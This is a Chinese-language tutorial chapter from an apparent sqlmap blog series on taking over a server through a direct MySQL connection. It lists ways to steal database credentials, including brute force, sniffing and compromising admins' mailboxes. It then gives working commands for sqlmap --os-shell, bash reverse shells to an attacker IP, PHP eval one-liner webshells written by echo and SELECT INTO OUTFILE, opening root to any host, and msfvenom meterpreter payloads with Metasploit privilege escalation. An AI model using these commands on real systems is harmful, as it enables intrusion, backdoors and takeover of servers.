sqlmap从入门到精通-第四章-4-2 使用sqlmap直连MySQL获取webshell

4.3 使用sqlmap直连MySQL获取webshell

在一些场景下,需要通过MySQL直接连接来获取权限,如果通过暴力破解,嗅探等方法获取了账户和密码,而服务器没开放Web服务的情况,那么就得直接通过数据库获取一定的权限了

4.3.1 使用场景

(1) 获取了MySQL数据库账户和密码

(2) 可以访问3306端口及数据库

4.3.2 扫描获取root账户的密码

通常有下面一些方法来获取root账户的密码

(1) phpMyAdmin 多线程批量破解工具,可以通过收集phpMyAdmin地址进行暴力破解

(2) 代码泄露获取数据库账户和密码

(3) 文件包含读取配置文件中的数据库账户和密码

(4) 通过网络嗅探获取

(5) 渗透运维人员的邮箱及个人主机获取

4.3.3 获取shell

1. 通过sqlmap连接MySQL获取shell

(1) 直接连接数据库

sqlmap.py -d "mysql://root:123456@127.0.0.1:3306/mysql" --os-shell

(2) 通过选择32位或者64位操作系统webshell,执行

bash -i >& /dev/tcp/10.12.22.33/8899 0>&1

(3) 反弹到服务器10.12.22.33 实际的环境中就是自己的独立公网IP地址

(4) 通过echo命令生成shell

echo "<?php @eval($_POST['bmfx']);?>" > /var/www/html/data/phpmyadmin/bmfx.php

如果可以通过phpmyadmin管理数据库,就可以修改host为"%" 并执行权限更新操作,具体如下:

use mysql;

update user set host = '%' where user = 'root';

flush privileges;

注意:如果数据库中有都个host连接,修改时可能会导致数据库连接出问题

2. 通过MSF反弹获取shell

(1) 使用msfvenom生成MSF反弹的PHP脚本木马,默认端口4444

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.12.22.33 -f raw > bmfx.php

(2) 在独立IP或者反弹服务器上运行MSF依次执行一下命令

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 10.12.22.33  //这个IP地址就是自己的独立服务器IP地址,

show options

run 0 或者 exploit

(3) 上传并执行PHP文件

将上面生成的bmfx.php文件上传至目标站点,然后访问,如果没有问题的话,那么MSF会显示成功反弹shell

3. 通过PHPMyAdmin管理解码查询生成webshell

select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE 'F:/phpstudy/www/bmfx.php'

4.3.4 实例演示

1. 直接连接MySQL数据库

sqlmap.py -d "mysql:/root:123456@xxx.xx.xx.xx:3306/mysql" --os-shell

如果上述成功了, 会让你选中服务器架构是32位还是64位

2. 上传UDF文件

在上述操作选择系统架构之后,sqlmap会自动上传UDF文件到服务器提权位置,记住,不管获取的shell是否成功都会显示os-shell提示符

3. 执行命令

cat /etc/passwd

如果是真的成功获取了shell,那么执行的结果就是我们想要的信息

4. 获取反弹shell

虽然通过sqlmap获取了shell,但实际操作的话着实不方便,需要使用独立的服务器进行反弹shell

nc -lvnp 9988

在sqlmap的shell执行

bash -i >& /dev/tcp/10.12.22.33:9988 0>&1

5. 在服务器上生成webshell

上述操作如果没有任何问题,那么就可以找到真实路径直接生成webshell,可以在获取的反弹shell中执行locate *.php找到网站的真实路径,然后在该路径下通过echo命令生成webshell,具体如下:

echo "<?php @eval($_POST['bmfx]);?>" > bmfx.php

6. 获取webshell

上面在服务器上生成的webshell是一句话,可以通过中国菜刀连接此一句话,进行获取webshell

7. 通过phpMyAdmin生成一句话后门

select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE '/var/www/phpmyadmin/bmfx.php'

8. 通过MSF反弹获取shell

9. MSF提权参考

通过MSF反弹shell,执行background将Session放在后台运行,然后搜索可以利用的exploit来进行测试,具体命令如下:

background

search "关键字"  //这里是跟漏洞相关的关键字,比如search tomcat 等等

use exploit/linux

show options

set session 1

exploit

sessions -i 1

getuid

 

 

sqlmap从入门到精通-第四章-4-2 使用sqlmap直连MySQL获取webshell
 
上一篇:应急响应之如何发现隐藏的Webshell后门


下一篇:sqlmap从入门到精通-第四章-4-2 SQL Server获取webshell及提权基础